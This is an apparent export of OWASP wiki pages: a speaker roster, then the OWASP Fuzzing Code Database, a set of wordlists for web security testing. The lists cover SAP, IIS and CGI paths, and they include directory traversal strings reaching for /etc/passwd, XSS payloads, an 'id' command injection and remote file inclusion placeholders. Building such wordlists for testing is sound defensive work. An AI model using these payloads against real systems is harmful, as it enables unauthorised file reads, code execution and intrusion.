| USA/San Francisco &amp;amp; Virtual Presentations&lt;br /&gt;
| [http://www.linkedin.com/in/mcoates BIO]&lt;br /&gt;
|-&lt;br /&gt;
| [mailto:dan.cornell@owasp.org Dan Cornell] &lt;br /&gt;
| Dan Cornell has over twelve years of experience architecting, developing and securing web-based software systems. He speaks on a variety of software development and software security topics such as Vulnerability Management, Software Security Remediation, and Code Review/Static Analysis. Dan is based in San Antonio, TX and available to fly/drive as needed to the site. &lt;br /&gt;
| USA/San Antonio &lt;br /&gt;
| [http://www.denimgroup.com/about_team_dan.html BIO]&lt;br /&gt;
|-&lt;br /&gt;
| [mailto:John.Steven@owasp.org John Steven] &lt;br /&gt;
| John speaks on a variety of topics including &amp;quot;How to build your own application security group&amp;quot;, &amp;quot;Threat Modeling&amp;quot;, &amp;quot;Code Review and Static analysis&amp;quot;, as well as other topics. John has spoken at and given tutorials for multiple OWASP conferences. John frequents New York, Boston, Washington DC, and Charlotte, but is available for travel elsewhere. &lt;br /&gt;
| Washington, DC/USA &lt;br /&gt;
| [http://www.cigital.com/about/team/management.php#jsteven BIO]&lt;br /&gt;
|-&lt;br /&gt;
| [mailto:blake@owasp.org Blake Cornell] &lt;br /&gt;
| Blake is available to speak regarding topics including Security v. HIPPA, Penetration Testing Methodologies, Fuzzing and Blended Threats such as attacking VoIP with the OWASP Top 10. Blake lives in the NY Metro area and is available for speaking at regional, national and world wide events. &lt;br /&gt;
| New York, NY/USA &lt;br /&gt;
| [http://www.linkedin.com/in/blakecornell BIO]&lt;br /&gt;
|-&lt;br /&gt;
| [mailto:Nick.Coblentz@gmail.com Nick Coblentz] &lt;br /&gt;
| Nick regularly performs research related to secure software development. He is available to present on topics such as the [http://www.owasp.org/index.php/Category:Software_Assurance_Maturity_Model Software Assurance Maturity Model (SAMM)], the [http://nickcoblentz.blogspot.com/2009/06/samm-inteview-template-version-10.html SAMM Interview Template], [http://nickcoblentz.blogspot.com/2009/05/issa-journal-web-application-security.html Building Web Application Security Portfolios], and [http://nickcoblentz.blogspot.com/2009/11/owasp-presentation-on-dec-10-microsoft.html The Microsoft SDL for Agile Development]. Please email Nick if you see articles on his [http://nickcoblentz.blogspot.com/ blog] that you would like him to present. &lt;br /&gt;
| USA/Kansas, Oklahoma, Missouri &lt;br /&gt;
| [http://www.linkedin.com/in/ncoblentz BIO]&lt;br /&gt;
|-&lt;br /&gt;
| [mailto:johnccr@yahoo.com Juan Carlos Calderon] &lt;br /&gt;
| Juan has being part of the Appliction Security industry for 9 years, currently performs research on application and information security arena. He is available to present &amp;quot;Preparing an strategy for application vulnerability detection&amp;quot;, &amp;quot;Owasp Spanish and Internationalization&amp;quot; and &amp;quot;Análisis y efectos del cibercrimen en Mexico&amp;quot;(Analysis and effects of cibercrime in México). He is also open to talk about other topics related to OWASP materials and tools, send him a note to verify the coverage. &lt;br /&gt;
| Aguascalientes/México &lt;br /&gt;
| [http://www.linkedin.com/in/juancarloscalderon BIO]&lt;br /&gt;
|-&lt;br /&gt;
| [mailto:edward@owasp.org Edward Bonver] &lt;br /&gt;
| Edward has over a decade of experience in the software security field. He currently works for Symantec's Product Security Team, where he brings all aspects of secure software development to product teams across the company. He is a frequent speaker at various industry conferences and OWASP events; topics of interest include Threat Modeling and Security Testing.&lt;br /&gt;
| Global(USA/Los Angeles-based)&lt;br /&gt;
| [http://www.linkedin.com/in/bonver BIO]&lt;br /&gt;
|-&lt;br /&gt;
| [mailto:ludovic.petit@owasp.org Ludovic Petit] &lt;br /&gt;
| Chapter Leader OWASP France and OWASP Global Connections Committee Member. [https://www.owasp.org/index.php/User:Ludovic_Petit '''Ludovic'''] is living in Paris and is available for speaking on a variety of Web Application Security topics, with however a preference for topics related to Legal responsibilities and Law Enforcement. Ludovic is willing to educate about the OWASP Foundation core mission, and explain why WebApp Security is also linked to Legal and Regulatory aspects. Who is accountable for what, what about each other's responsabilities as well as  the Corporate Responsability when dealing with WebApp Security? Interesting isn't it? &lt;br /&gt;
| France, Europe, Canada or elsewhere, as needed&lt;br /&gt;
| [http://www.linkedin.com/in/lpetit BIO]&lt;br /&gt;
|-&lt;br /&gt;
| [mailto:magno.logan@owasp.org Magno Logan] &lt;br /&gt;
| OWASP Paraiba Chapter Leader and OWASP Portuguese Language Project Member. Magno (Logan) Rodrigues has an MBA in Information Security and studied Computer Forensics for one year in New York. He has done many talks about OWASP and it's main projects at national and international events such as [http://www.ensol.org.br/ ENSOL], [http://gts.nic.br/ GTS] and [https://www.owasp.org/index.php/AppSecLatam2011 App Sec Latam 2011]. Topics of interest include: OWASP Top 10, WebGoat, Java Security, E-commerce Security and Computer Forensics.&lt;br /&gt;
&lt;br /&gt;
| Latin America&lt;br /&gt;
| [https://www.owasp.org/index.php/User:Magno_Logan BIO]&lt;br /&gt;
|-&lt;br /&gt;
| [mailto:wagner.elias@owasp.org Wagner Elias] &lt;br /&gt;
| Wagner founded the Brazil chapter is currently Curitiba-Brazil Chapter Leader and available to talk on a variety of web application security topics. Talks are interactive and include live demos and code examples. Wagner has spoken at various conferences in Brazil.&lt;br /&gt;
&lt;br /&gt;
Topics of interest: Mobile Security; SDL Process and Implementation; Code Review and Application Test&lt;br /&gt;
&lt;br /&gt;
| Brazil&lt;br /&gt;
| [https://www.owasp.org/index.php/User:wagner.elias BIO]&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
*Add your name, contact and bio information to become available as OWASP Speaker!&lt;/div&gt;</summary>
		<author><name>Wagner.elias</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=119956</id>
		<title>Category:OWASP Fuzzing Code Database</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=119956"/>
				<updated>2011-11-10T08:15:31Z</updated>
		
		<summary type="html">&lt;p&gt;Wagner.elias: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This database is a collection of several statements used in code injection, fuzzing and brute-force aproach. All too often security professionals rely on their own repositories of statements collected from assessments they've conducted. These repositories are prone to being incomplete or outdated. We want to collect all these statements, merging the statements from several projects like [[WebScarab]], [[WebSlayer]] and [[JBroFuzz]] with member contributions to build a comprehensive dataset of effective statements to provide better testing results. Please add your own statements and check out the statements already added. &lt;br /&gt;
&lt;br /&gt;
==== News  ====&lt;br /&gt;
&lt;br /&gt;
'''10 November 2011'''&lt;br /&gt;
&lt;br /&gt;
*Update Category: SAP Common URL Web Interfaces (10 November 2011 - Total Statements: 155)&lt;br /&gt;
&lt;br /&gt;
'''08 November 2010'''&lt;br /&gt;
&lt;br /&gt;
*Created new Category: Adobe XML Files (08 November 2010 - Total Statements: 16)&lt;br /&gt;
&lt;br /&gt;
'''15 September 2010'''&lt;br /&gt;
&lt;br /&gt;
*Created new Category: SAP Common URL Web Interfaces (15 September 2010 - Total Statements: 6)&lt;br /&gt;
&lt;br /&gt;
'''17 March 2010'''&lt;br /&gt;
&lt;br /&gt;
*Created new Category: Vulnerable Cross-Platform CGI (17 March 2010 - Total Statements: 563)&lt;br /&gt;
*Created new Category: Windows Directory Traversal (Update: 17 March 2010 - Total Statements: 16)&lt;br /&gt;
*Created new Category: Generic 8 Directory Deep Traversal Fuzz (17 March 2010 - Total Statements: 879)&lt;br /&gt;
*Created new Category: Common Windows CGI (Update: 17 March 2010 - Total Statements: 76)&lt;br /&gt;
*Created new Category: File Upload Filter Bypass (Update: 17 March 2010 - Total Statements: 4)&lt;br /&gt;
*Created new Category: Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 2)&lt;br /&gt;
*Created new Category: Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 7)&lt;br /&gt;
*Created new Category: Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 14)&lt;br /&gt;
*Created new Category: Commonly Writable directories File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 9)&lt;br /&gt;
&lt;br /&gt;
'''16 March 2010'''&lt;br /&gt;
&lt;br /&gt;
*Created new Category: Common Data File Extensions (Update: 16 March 2010 - Total Statements: 863)&lt;br /&gt;
*Created new Category: Uncommon Data File Extensions (Update: 16 March 2010 - Total Statements: 284) &lt;br /&gt;
*Created new Category: Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65)&lt;br /&gt;
*Created new Category: All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2010 - Total Statements: 31)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''02 February 2010'''&lt;br /&gt;
&lt;br /&gt;
*Created new Category Lotus/Notes Files&lt;br /&gt;
&lt;br /&gt;
'''11 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category: XML Attacks&lt;br /&gt;
&lt;br /&gt;
''Update Statements'' &lt;br /&gt;
&lt;br /&gt;
*15 new XML Statements &lt;br /&gt;
*93 new SQL Injections Statements &lt;br /&gt;
*67 new Traversal Directory Statements &lt;br /&gt;
*Delete 33 XSS Statement Duplicate &lt;br /&gt;
*30 New XSS Statements&lt;br /&gt;
&lt;br /&gt;
'''7 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Updated the objectives of the project.&lt;br /&gt;
&lt;br /&gt;
'''21 July 2009''' &lt;br /&gt;
&lt;br /&gt;
*Set the team responsible for the project.&lt;br /&gt;
&lt;br /&gt;
==== Goals  ====&lt;br /&gt;
&lt;br /&gt;
This project intend to create a database that concentrate all tools which are based on wordlists such as Webscarab, JBroFuzz, Web Slayer , Dirbuster. and others. In addition to current tools developed by OWASP members we will create a database following a style similar to Open Vulnerability and Assessment Language (OVAL) where any tool can adopt and use a XML file maintained by OWASP. &lt;br /&gt;
&lt;br /&gt;
In addition, the following functionalities will be included on this project: &lt;br /&gt;
&lt;br /&gt;
1 - The statements of ASDR Project 2 - Browser 3 - Operational System 4 - Databases &lt;br /&gt;
&lt;br /&gt;
An URL will also be published to create an collaborative environment for the maintenance process where the following features are planned: &lt;br /&gt;
&lt;br /&gt;
1 - Deploy a process where a new statement can be suggested and registered if is not valid yet and not maintained in other database. &lt;br /&gt;
&lt;br /&gt;
2 - A list where besides the statement, a single id will be maintained to identify each statement with a description and the results of the exploitation. &lt;br /&gt;
&lt;br /&gt;
3 - Possibility to support users on the report of their own experiences with the statements. &lt;br /&gt;
&lt;br /&gt;
==== Statements  ====&lt;br /&gt;
&lt;br /&gt;
=== Adobe XML Files (08 November 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
/flex2gateway/&lt;br /&gt;
/flex2gateway/http&lt;br /&gt;
/flex2gateway/httpsecure&lt;br /&gt;
/flex2gateway/cfamfpoolling&lt;br /&gt;
/flex2gateway/amf&lt;br /&gt;
/flex2gateway/amfpolling&lt;br /&gt;
/messagebroker/http&lt;br /&gt;
/messagebroker/httpsecure&lt;br /&gt;
/blazeds/messagebroker/http&lt;br /&gt;
/blazeds/messagebroker/httpsecure&lt;br /&gt;
/samples/messagebroker/http&lt;br /&gt;
/samples/messagebroker/httpsecure&lt;br /&gt;
/lcds/messagebroker/http&lt;br /&gt;
/lcds/messagebroker/httpsecure&lt;br /&gt;
/lcds-samples/messagebroker/http&lt;br /&gt;
/lcds-samples/messagebroker/httpsecure&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== SAP Commom URL Web Interface (10 November 2011) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
/rep/build_info.html&lt;br /&gt;
/rep/build_info.jsp&lt;br /&gt;
/run/build_info.html&lt;br /&gt;
/run/build_info.jsp&lt;br /&gt;
/rwb/version.html&lt;br /&gt;
/sap/bc/bsp/esh_os_service/favicon.gif&lt;br /&gt;
/sap/bc/bsp/sap&lt;br /&gt;
/sap/bc/bsp/sap/alertinbox&lt;br /&gt;
/sap/bc/bsp/sap/bsp_dlc_frcmp&lt;br /&gt;
/sap/bc/bsp/sap/bsp_veri&lt;br /&gt;
/sap/bc/bsp/sap/bsp_verificatio&lt;br /&gt;
/sap/bc/bsp/sap/bsp_wd_base&lt;br /&gt;
/sap/bc/bsp/sap/bspwd_basics&lt;br /&gt;
/sap/bc/bsp/sap/certmap&lt;br /&gt;
/sap/bc/bsp/sap/certreq&lt;br /&gt;
/sap/bc/bsp/sap/crm_bsp_frame&lt;br /&gt;
/sap/bc/bsp/sap/crmcmp_bpident/&lt;br /&gt;
/sap/bc/bsp/sap/crmcmp_brfcase&lt;br /&gt;
/sap/bc/bsp/sap/crmcmp_hdr&lt;br /&gt;
/sap/bc/bsp/sap/crmcmp_hdr_std&lt;br /&gt;
/sap/bc/bsp/sap/crmcmp_ic_frame&lt;br /&gt;
/sap/bc/bsp/sap/crm_thtmlb_util&lt;br /&gt;
/sap/bc/bsp/sap/crm_ui_frame&lt;br /&gt;
/sap/bc/bsp/sap/crm_ui_start&lt;br /&gt;
/sap/bc/bsp/sap/esh_sap_link&lt;br /&gt;
/sap/bc/bsp/sap/esh_sapgui_exe&lt;br /&gt;
/sap/bc/bsp/sap/graph_bsp_test&lt;br /&gt;
/sap/bc/bsp/sap/graph_bsp_test/Mimes&lt;br /&gt;
/sap/bc/bsp/sap/gsbirp&lt;br /&gt;
/sap/bc/bsp/sap/htmlb_samples&lt;br /&gt;
/sap/bc/bsp/sap/iccmp_bp_cnfirm&lt;br /&gt;
/sap/bc/bsp/sap/iccmp_hdr_cntnr&lt;br /&gt;
/sap/bc/bsp/sap/iccmp_hdr_cntnt&lt;br /&gt;
/sap/bc/bsp/sap/iccmp_header&lt;br /&gt;
/sap/bc/bsp/sap/iccmp_ssc_ll/&lt;br /&gt;
/sap/bc/bsp/sap/ic_frw_notify&lt;br /&gt;
/sap/bc/bsp/sap/it00&lt;br /&gt;
/sap/bc/bsp/sap/public/bc&lt;br /&gt;
/sap/bc/bsp/sap/public/graphics&lt;br /&gt;
/sap/bc/bsp/sap/sam_demo&lt;br /&gt;
/sap/bc/bsp/sap/sam_notifying&lt;br /&gt;
/sap/bc/bsp/sap/sam_sess_queue&lt;br /&gt;
/sap/bc/bsp/sap/sbspext_htmlb&lt;br /&gt;
/sap/bc/bsp/sap/sbspext_xhtmlb&lt;br /&gt;
/sap/bc/bsp/sap/spi_admin&lt;br /&gt;
/sap/bc/bsp/sap/spi_monitor&lt;br /&gt;
/sap/bc/bsp/sap/sxms_alertrules&lt;br /&gt;
/sap/bc/bsp/sap/system&lt;br /&gt;
/sap/bc/bsp/sap/thtmlb_scripts&lt;br /&gt;
/sap/bc/bsp/sap/thtmlb_styles&lt;br /&gt;
/sap/bc/bsp/sap/uicmp_ltx&lt;br /&gt;
/sap/bc/bsp/sap/xmb_bsp_log&lt;br /&gt;
/sap/bc/contentserver&lt;br /&gt;
/sap/bc/echo&lt;br /&gt;
/sap/bc/error&lt;br /&gt;
/sap/bc/FormToRfc&lt;br /&gt;
/sap/bc/graphics/net&lt;br /&gt;
/sap/bc/gui/sap/its/CERTREQ&lt;br /&gt;
/sap/bc/gui/sap/its/designs&lt;br /&gt;
/sap/bc/gui/sap/its/webgui&lt;br /&gt;
/sap/bc/IDoc_XML&lt;br /&gt;
/sap/bc/ping&lt;br /&gt;
/sap/bc/report&lt;br /&gt;
/sap/bc/soap/ici&lt;br /&gt;
/sap/bc/soap/rfc&lt;br /&gt;
/sap/bc/srt/IDoc&lt;br /&gt;
/sap/bc/wdvd&lt;br /&gt;
/sap/bc/webdynpro/sap/apb_launchpad&lt;br /&gt;
/sap/bc/webdynpro/sap/apb_launchpad_nwbc&lt;br /&gt;
/sap/bc/webdynpro/sap/apb_lpd_light_start&lt;br /&gt;
/sap/bc/webdynpro/sap/apb_lpd_start_url&lt;br /&gt;
/sap/bc/webdynpro/sap/application_exit&lt;br /&gt;
/sap/bc/webdynpro/sap/appl_log_trc_viewer&lt;br /&gt;
/sap/bc/webdynpro/sap/appl_soap_management&lt;br /&gt;
/sap/bc/webdynpro/sap/ccmsbi_wast_extr_testenv&lt;br /&gt;
/sap/bc/webdynpro/sap/cnp_light_test&lt;br /&gt;
/sap/bc/webdynpro/sap/configure_application&lt;br /&gt;
/sap/bc/webdynpro/sap/configure_component&lt;br /&gt;
/sap/bc/webdynpro/sap/esh_search_results.ui&lt;br /&gt;
/sap/bc/webdynpro/sap/esh_adm_smoketest_ui&lt;br /&gt;
/sap/bc/webdynpro/sap/sh_adm_smoketest_files&lt;br /&gt;
/sap/bc/webdynpro/sap/esh_eng_modelling&lt;br /&gt;
/sap/bc/webdynpro/sap/esh_admin_ui_component&lt;br /&gt;
/sap/bc/webdynpro/sap/wdhc_application&lt;br /&gt;
/sap/bc/webdynpro/sap/wd_analyze_config_appl&lt;br /&gt;
/sap/bc/webdynpro/sap/wd_analyze_config_comp&lt;br /&gt;
/sap/bc/webdynpro/sap/wd_analyze_config_user&lt;br /&gt;
/sap/bc/webdynpro/sap/WDR_TEST_ADOBE&lt;br /&gt;
/sap/bc/webdynpro/sap/WDR_TEST_EVENTS&lt;br /&gt;
/sap/bc/webdynpro/sap/wdr_test_popups_rt&lt;br /&gt;
/sap/bc/webdynpro/sap/WDR_TEST_TABLE&lt;br /&gt;
/sap/bc/webdynpro/sap/wdr_test_ui_elements&lt;br /&gt;
/sap/bc/webdynpro/sap/WDR_TEST_WINDOW_ERROR&lt;br /&gt;
/sap/bc/webrfc&lt;br /&gt;
/sap/bc/xrfc&lt;br /&gt;
/sap/bc/xrfc_test&lt;br /&gt;
/sap/es/cockpit&lt;br /&gt;
/sap/es/getdocument&lt;br /&gt;
/sap/es/opensearch&lt;br /&gt;
/sap/es/opensearch/description&lt;br /&gt;
/sap/es/opensearch/list&lt;br /&gt;
/sap/es/opensearch/search&lt;br /&gt;
/sap/es/saplink&lt;br /&gt;
/sap/es/search&lt;br /&gt;
/sap/es/redirect&lt;br /&gt;
/sap/crm&lt;br /&gt;
/sap/public/bc&lt;br /&gt;
/sap/public/bc/icons&lt;br /&gt;
/sap/public/bc/icons_rtl&lt;br /&gt;
/sap/public/bc/its/mimes&lt;br /&gt;
/sap/public/bc/its/mimes/system/SL/page/hourglass.html&lt;br /&gt;
/sap/public/bc/its/mobile/itsmobile00&lt;br /&gt;
/sap/public/bc/its/mobile/itsmobile01&lt;br /&gt;
/sap/public/bc/its/mobile/rfid&lt;br /&gt;
/sap/public/bc/its/mobile/start&lt;br /&gt;
/sap/public/bc/its/mobile/test&lt;br /&gt;
/sap/public/bc/NWDEMO_MODEL&lt;br /&gt;
/sap/public/bc/NW_ESH_TST_AUTO&lt;br /&gt;
/sap/public/bc/pictograms&lt;br /&gt;
/sap/public/bc/sicf_login_run&lt;br /&gt;
/sap/public/bc/trex&lt;br /&gt;
/sap/public/bc/ur&lt;br /&gt;
/sap/public/bc/wdtracetool&lt;br /&gt;
/sap/public/bc/webdynpro/adobechallenge&lt;br /&gt;
/sap/public/bc/webdynpro/mimes&lt;br /&gt;
/sap/public/bc/webdynpro/ssr&lt;br /&gt;
/sap/public/bc/webdynpro/viewdesigner&lt;br /&gt;
/sap/public/bc/webicons&lt;br /&gt;
/sap/public/bc/workflow&lt;br /&gt;
/sap/public/bc/workflow/shortcut&lt;br /&gt;
/sap/public/bsp/sap&lt;br /&gt;
/sap/public/bsp/sap/htmlb&lt;br /&gt;
/sap/public/bsp/sap/public&lt;br /&gt;
/sap/public/bsp/sap/public/bc&lt;br /&gt;
/sap/public/bsp/sap/public/faa&lt;br /&gt;
/sap/public/bsp/sap/public/graphics&lt;br /&gt;
/sap/public/bsp/sap/public/graphics/jnet_handler&lt;br /&gt;
/sap/public/bsp/sap/public/graphics/mimes&lt;br /&gt;
/sap/public/bsp/sap/system&lt;br /&gt;
/sap/public/bsp/sap/system_public&lt;br /&gt;
/sap/public/icf_check&lt;br /&gt;
/sap/public/icf_info&lt;br /&gt;
/sap/public/icf_info/icr_groups&lt;br /&gt;
/sap/public/icf_info/icr_urlprefix&lt;br /&gt;
/sap/public/icf_info/logon_groups&lt;br /&gt;
/sap/public/icf_info/urlprefix&lt;br /&gt;
/sap/public/icman&lt;br /&gt;
/sap/public/info&lt;br /&gt;
/sap/public/myssocntl&lt;br /&gt;
/sap/public/ping&lt;br /&gt;
/sap/webcuif&lt;br /&gt;
/sap/public/icman/ping&lt;br /&gt;
/sap/admin&lt;br /&gt;
/sap/wdisp/admin&lt;br /&gt;
/scripts/wgate&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Microsoft URLs (8 April 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Interesting IIS Files &amp;amp; Directories (8 April 2010)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
# Look at the result codes in the headers - 403 likely mean the dir exists, 404  means not. It takes an ISAPI filter for IIS to return 404's for 403s. &lt;br /&gt;
# Altetrnatively, slight differences in the number of bytes returned will help differentiate.&lt;br /&gt;
&lt;br /&gt;
/.printer&lt;br /&gt;
/%NETHOOD%/&lt;br /&gt;
/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;.aspx&lt;br /&gt;
/AccessPlatform/&lt;br /&gt;
/AccessPlatform/auth/&lt;br /&gt;
/AccessPlatform/auth/clientscripts/cookies.js &lt;br /&gt;
/AccessPlatform/auth/clientscripts/login.js &lt;br /&gt;
/Exadmin/&lt;br /&gt;
/ExchWeb/&lt;br /&gt;
/Exchange/&lt;br /&gt;
/Microsoft-Server-ActiveSync/&lt;br /&gt;
/OMA/&lt;br /&gt;
/OWA/&lt;br /&gt;
/Public/&lt;br /&gt;
/_layouts/alllibs.htm&lt;br /&gt;
/_layouts/settings.htm&lt;br /&gt;
/_layouts/userinfo.htm&lt;br /&gt;
/_vti_bin/&lt;br /&gt;
/_vti_bin/_vti_aut/fp30reg.dll&lt;br /&gt;
/_vti_pvt/&lt;br /&gt;
/_WEB_INF/&lt;br /&gt;
/a%5c.aspx&lt;br /&gt;
/adovbs.inc&lt;br /&gt;
/aspnet_files/&lt;br /&gt;
/certcontrol/&lt;br /&gt;
/certenroll/&lt;br /&gt;
/certsrv/&lt;br /&gt;
/citrix/&lt;br /&gt;
/citrix/AccessPlatform/auth/&lt;br /&gt;
/citrix/AccessPlatform/auth/clientscripts/&lt;br /&gt;
/AccessPlatform/auth/clientscripts/&lt;br /&gt;
/Citrix//AccessPlatform/auth/clientscripts/cookies.js &lt;br /&gt;
/Citrix/AccessPlatform/auth/clientscripts/login.js &lt;br /&gt;
/Citrix/PNAgent/config.xml&lt;br /&gt;
/exchange/root.asp&lt;br /&gt;
/forum.asp&lt;br /&gt;
/forum_arc.asp&lt;br /&gt;
/forum_professionnel.asp&lt;br /&gt;
/iisadmin/&lt;br /&gt;
/iisadmpwd/achg.htr&lt;br /&gt;
/iisadmpwd/aexp.htr&lt;br /&gt;
/iisadmpwd/aexp2.htr&lt;br /&gt;
/iisadmpwd/aexp2b.htr&lt;br /&gt;
/iisadmpwd/aexp3.htr&lt;br /&gt;
/iisadmpwd/aexp4.htr&lt;br /&gt;
/iisadmpwd/aexp4b.htr&lt;br /&gt;
/iisadmpwd/anot.htr&lt;br /&gt;
/iisadmpwd/anot3.htr&lt;br /&gt;
/iiasdmpwd/&lt;br /&gt;
/iishelp/&lt;br /&gt;
/iishelp/iis/misc/default.asp&lt;br /&gt;
/iissamples/&lt;br /&gt;
/imprimer.asp&lt;br /&gt;
/includes/adovbs.inc&lt;br /&gt;
/msadc/&lt;br /&gt;
/null.htw&lt;br /&gt;
/pbserver/pbserver.dll&lt;br /&gt;
/postinfo.html&lt;br /&gt;
/rubrique.asp&lt;br /&gt;
/scripts/&lt;br /&gt;
/scripts/fpcount.exe&lt;br /&gt;
/scripts/cgimail.exe&lt;br /&gt;
/scripts/tools/newdsn.exe&lt;br /&gt;
/scripts/tools/getdrvs.exe&lt;br /&gt;
/scripts/convert.bas&lt;br /&gt;
/cgi-bin/htmlscript&lt;br /&gt;
/scripts/counter.exe&lt;br /&gt;
/scripts/no-such-file.pl&lt;br /&gt;
/share/&lt;br /&gt;
/tsweb/&lt;br /&gt;
/~/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;.asp&lt;br /&gt;
/~/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;.aspx&lt;br /&gt;
/index.shtml&lt;br /&gt;
/x.htw&lt;br /&gt;
/x.ida&lt;br /&gt;
/x.idq&lt;br /&gt;
/cgi&lt;br /&gt;
/scripts/iisadmin/ism.dll?http/dir&lt;br /&gt;
/scripts/samples/search/webhits.exe&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Vulnerable Cross-Platform CGI (17 March 2010 - Total Statements: 563) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Vulnerable Cross-Platform CGI (17 March 2010) &lt;br /&gt;
# fuzz inside cgi directories&lt;br /&gt;
# on windows, this is usually /scripts or /bin or /cgi-bin, on unix, usually /cgi-bin, /nph-cgi&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
&lt;br /&gt;
%2e%2e/abyss.conf&lt;br /&gt;
.access&lt;br /&gt;
.cobalt&lt;br /&gt;
.cobalt/alert/service.cgi?service=&amp;lt;img%20src=javascript:alert('XSS')&amp;gt;&lt;br /&gt;
.cobalt/alert/service.cgi?service=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
.fhp&lt;br /&gt;
.htaccess&lt;br /&gt;
.htaccess.old&lt;br /&gt;
.htaccess.save&lt;br /&gt;
.htaccess~&lt;br /&gt;
.htpasswd&lt;br /&gt;
.nsconfig&lt;br /&gt;
.passwd&lt;br /&gt;
.www_acl&lt;br /&gt;
.wwwacl&lt;br /&gt;
/_vti_pvt/doctodep.btr&lt;br /&gt;
14all-1.1.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
14all.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
AT-admin.cgi&lt;br /&gt;
AT-generate.cgi&lt;br /&gt;
Album?mode=album&amp;amp;album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&amp;amp;dispsize=640&amp;amp;start=0&lt;br /&gt;
AnyBoard.cgi&lt;br /&gt;
AnyForm&lt;br /&gt;
AnyForm2&lt;br /&gt;
Backup/add-passwd.cgi&lt;br /&gt;
C&lt;br /&gt;
Count.cgi&lt;br /&gt;
DC&lt;br /&gt;
DCFORM&lt;br /&gt;
File&lt;br /&gt;
FormHandler.cgi?realname=aaa&amp;amp;email=aaa&amp;amp;reply_message_template=%2Fetc%2Fpasswd&amp;amp;reply_message_from=sq%40example.com&amp;amp;redirect=http%3A%2F%2Fwww.example.com&amp;amp;recipient=sq%40example.com&lt;br /&gt;
FormMail.cgi?&amp;lt;script&amp;gt;alert(\&lt;br /&gt;
FormMail.pl&lt;br /&gt;
ImageFolio/admin/admin.cgi&lt;br /&gt;
LWGate&lt;br /&gt;
LWGate.cgi&lt;br /&gt;
Upload.pl&lt;br /&gt;
Vs&lt;br /&gt;
W&lt;br /&gt;
YaBB.pl?board=news&amp;amp;action=display&amp;amp;num=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
YaBB/YaBB.cgi?board=BOARD&amp;amp;action=display&amp;amp;num=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp3.cgi?../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp4.cgi?../../../../../../..{KNOWNFILE}&lt;br /&gt;
add_ftp.cgi&lt;br /&gt;
addbanner.cgi&lt;br /&gt;
adduser.cgi&lt;br /&gt;
admin.cgi&lt;br /&gt;
admin.cgi?list=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
admin.php&lt;br /&gt;
admin.php3&lt;br /&gt;
admin.pl&lt;br /&gt;
adminhot.cgi&lt;br /&gt;
adminwww.cgi&lt;br /&gt;
af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd&lt;br /&gt;
aglimpse&lt;br /&gt;
aglimpse.cgi&lt;br /&gt;
alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,&lt;br /&gt;
alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd&lt;br /&gt;
amadmin.pl&lt;br /&gt;
anacondaclip.pl?template=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ans.pl?p=../../../../../usr/bin/id|&amp;amp;blah&lt;br /&gt;
ans/ans.pl?p=../../../../../usr/bin/id|&amp;amp;blah&lt;br /&gt;
anyboard.cgi&lt;br /&gt;
archie&lt;br /&gt;
architext_query.cgi&lt;br /&gt;
architext_query.pl&lt;br /&gt;
ash&lt;br /&gt;
astrocam.cgi&lt;br /&gt;
atk/javascript/class.atkdateattribute.js.php?config_atkroot=@RFIURL&lt;br /&gt;
auction/auction.cgi?action=&lt;br /&gt;
auctiondeluxe/auction.pl&lt;br /&gt;
auktion.cgi?menue=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
